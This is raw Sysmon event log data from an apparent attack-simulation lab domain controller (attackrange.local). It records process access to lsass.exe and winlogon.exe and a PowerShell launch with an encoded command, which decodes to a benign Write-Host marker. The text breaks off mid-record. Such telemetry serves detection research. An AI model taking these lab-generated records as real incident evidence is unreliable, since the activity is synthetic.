16:54:43.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242751Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242750Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.123{05ADC7E1-6DD3-603E-D6AA-00000000AD01}10156ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_1n5wvxd5.zey.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242749Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242748Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.123{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E59B1B443159595B39A5213E2A4BEE81,SHA256=0FC35CE795454D1EC749C9197762DA5C3AB6B6FAE92C7D4B8711CBF6D2392C56,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242747Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.123{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6DD3-603E-D9AA-00000000AD01}4448C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002242746Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.123{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6DD3-603E-D8AA-00000000AD01}14280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002242745Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.108{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242744Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.108{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242743Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.108{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242742Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.108{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242741Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.108{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6DD3-603E-D8AA-00000000AD01}14280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002242740Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.108{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-D8AA-00000000AD01}14280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002242739Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.120{05ADC7E1-6DD3-603E-D8AA-00000000AD01}14280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /EncodedCo VwByAGkAdABlAC0ASABvAHMAdAAgADkAZABkADUAZAAzAGUAZAAtADUAZAAzADMALQA0ADcANwAxAC0AYgA5AGEAZQAtADMAOQBkADMAZgAyADkANwBhAGYAYgA2AA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 11241100x80000000000000002242738Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.108{05ADC7E1-6DD3-603E-D6AA-00000000AD01}10156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_1n5wvxd5.zey.ps12021-03-02 16:54:43.108 10341000x80000000000000002242737Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.092{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-D6AA-00000000AD01}10156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242736Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-D7AA-00000000AD01}4420C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242735Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-D6AA-00000000AD01}10156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242734Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-D5AA-00000000AD01}15664C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242733Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-D4AA-00000000AD01}15248C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242732Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-D3AA-00000000AD01}15816C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242731Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.092{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6DD2-603E-D4AA-00000000AD01}15248C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242730Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.092{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6DD2-603E-D4AA-00000000AD01}15248C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242729Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-D2AA-00000000AD01}13920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242728Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242727Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 